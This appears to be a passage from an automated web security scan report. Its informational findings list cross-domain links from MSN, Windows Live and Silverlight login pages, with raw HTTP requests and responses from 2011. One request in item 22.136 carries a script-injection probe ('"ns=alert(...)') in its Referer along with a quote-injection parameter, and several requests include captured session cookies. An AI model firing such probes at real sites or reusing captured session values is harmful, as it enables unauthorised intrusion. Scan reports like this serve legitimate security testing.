...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201">Yellow pages</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/today?q=Dallas+TX+weather&unit=F&Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/weather/forecast?q=Dallas+TX+weather&unit=F&Form=MSNLAP">Compare forecasts from multiple weather providers</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false">Feedback</a>
...[SNIP]...

22.130. http://local.redacted/weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/weather.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/weather.aspx?q=Dallas-TX&zip=75201

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/forecast?q=Dallas+TX+weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/today?q=Dallas+TX+weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344860&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fweather.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false

Request

GET /weather.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:40 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c5c75e08cc68426881e3694bd3f9a395; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E00324EC5C7F4EC9A83E6655A7F8FC3A; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:40 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344860&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fweather.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNLEC">Saturday, Jan. 29, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201">Yellow pages</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/today?q=Dallas+TX+weather&unit=F&Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/weather/forecast?q=Dallas+TX+weather&unit=F&Form=MSNLAP">Compare forecasts from multiple weather providers</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false">Feedback</a>
...[SNIP]...

22.131. http://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.live.com
Path:	/login.srf

Issue detail

The page was loaded from a URL containing a query string:

http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us

The response contains the following links to other domains:

http://img.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/images/Windows_Live_v_thumb.jpg
http://js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js
http://js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/WLWorkflow.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:47:54 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H23 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:46:54 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344874&id=64855&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-8ea8ec15-7602-4ffd-bb4f-7be5753c81c7; path=/;version=1
X-Frame-Options: deny
Content-Length: 13609



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script><link rel="image_src" href="http://Img.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/images/Windows_Live_v_thumb.jpg" / >
<script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://Js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js"></script>
<script type="text/javascript" src="http://Js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/WLWorkflow.js"></script>
...[SNIP]...

22.132. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The page was loaded from a URL containing a query string:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US

The response contains the following link to another domain:

https://secure.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/css/R3WinLive1033.css

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 29 Jan 2011 23:12:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:11:17 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H55 V: 0
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342737&co=1&id=251248; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
Vary: Accept-Encoding
Content-Length: 13981



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script>
<link rel="stylesheet" title="R3CSS" type="text/css" href="https://secure.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/css/R3WinLive1033.css"/><style type="text/css">
...[SNIP]...

22.133. https://login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/post.srf

Issue detail

The page was loaded from a URL containing a query string:

https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US&bk=1296342737

The response contains the following link to another domain:

https://secure.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/css/R3WinLive1033.css

Request

GET /ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US&bk=1296342737 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:15 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H58 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:15 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-d99a2e93-5037-4edc-af4e-025279d033ed; path=/;version=1
X-Frame-Options: deny
Content-Length: 13683



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script>
<link rel="stylesheet" title="R3CSS" type="text/css" href="https://secure.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/css/R3WinLive1033.css"/><style type="text/css">
...[SNIP]...

22.134. https://login.live.com/ppsecure/secure.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/secure.srf

Issue detail

The page was loaded from a URL containing a query string:

https://login.live.com/ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&id=251248&cbcxt=hom&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&id=251248&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&bk=1296342737

The response contains the following link to another domain:

https://secure.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/css/R3WinLive1033.css

Request

GET /ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&id=251248&cbcxt=hom&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&id=251248&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&bk=1296342737 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:16 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H46 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:16 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342796&co=1&id=251248; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-a94efd6f-f0dc-426f-9b9b-a74c06b53358; path=/;version=1
X-Frame-Options: deny
Content-Length: 16154



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script>
<link rel="stylesheet" title="R3CSS" type="text/css" href="https://secure.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/css/R3WinLive1033.css"/><style type="text/css">
...[SNIP]...

22.135. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296405095&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:41:35 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:31:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296405095&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296405095&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.136. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/createuser.aspx?returnurl='

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296408753&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

GET /login/createuser.aspx?returnurl=' HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dhttps%25253A//login.silverlight.net/login/createuser.aspx%25253Freturnurl%25253D%252527%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:32:32 GMT
Content-Length: 8922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296408753&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&lc=1033&id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296408753&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.137. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343536&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:35:36 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:25:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343536&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343536&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.138. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402633&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=1p3w2555guyp4vyezvapkw2m; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:00:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:50:33 GMT
Content-Length: 9085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Create
...[SNIP]...
<p class="no_lines">
